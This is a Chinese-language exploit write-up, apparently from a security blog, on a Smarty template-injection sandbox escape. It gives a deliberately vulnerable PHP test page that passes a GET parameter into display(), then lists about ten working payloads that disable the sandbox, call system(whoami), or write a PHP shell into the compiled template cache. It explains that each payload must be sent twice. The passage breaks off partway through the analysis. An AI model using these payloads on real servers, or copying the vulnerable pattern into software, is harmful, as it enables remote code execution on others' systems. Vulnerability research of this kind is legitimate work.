<?php
error_reporting(0);
include_once('Smarty.class.php');
$smarty = new Smarty();
$smarty->enableSecurity();
$smarty->display($_GET['abgl']);//$smarty->fetch($_GET['abgl']);
?>
还是和之前一样的test代码 poc:
string:{$s=$smarty.template_object->smarty}{$fp=$smarty.template_object->compiled->filepath}{Smarty_Internal_Runtime_WriteFile::writeFile($fp,"<?php+system(systeminfo);+?>",$s)}
`string:{$smarty.template_object->smarty->_getSmartyObj()->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->enableSecurity()->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->disableSecurity()->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->addTemplateDir('./x')->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->setTemplateDir('./x')->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->addPluginsDir('./x')->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->setPluginsDir('./x')->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->setCompileDir('./x')->display('string:{system(whoami)}')}`
`string:{$smarty.template_object->smarty->setCacheDir('./x')->display('string:{system(whoami)}')}`
要注意的是,poc需要执行两次才会有回显
第一次会往模板文件夹写入poc的缓存文件,第二次才是触发 首先解释一下poc中的string
,在cve-2017-1000210中的poc也是利用了string,需要知道,这两个漏洞都是跟template有关。在smarty模板中,string会将模板写入磁盘(即cache和template_c),随后通过
Smarty_Template_Compiled
类将poc插入进而编译和加载
因为这里的测试代码是打开了安全模式或者说沙盒 所以这里我们采用这道poc来讲解
string:{$smarty.template_object->smarty->disableSecurity()->display('string:{system(whoami)}')}
可以看到我这里是system用户 回过头来看templates_c,当我们运行poc,多了两个编译文件 一
二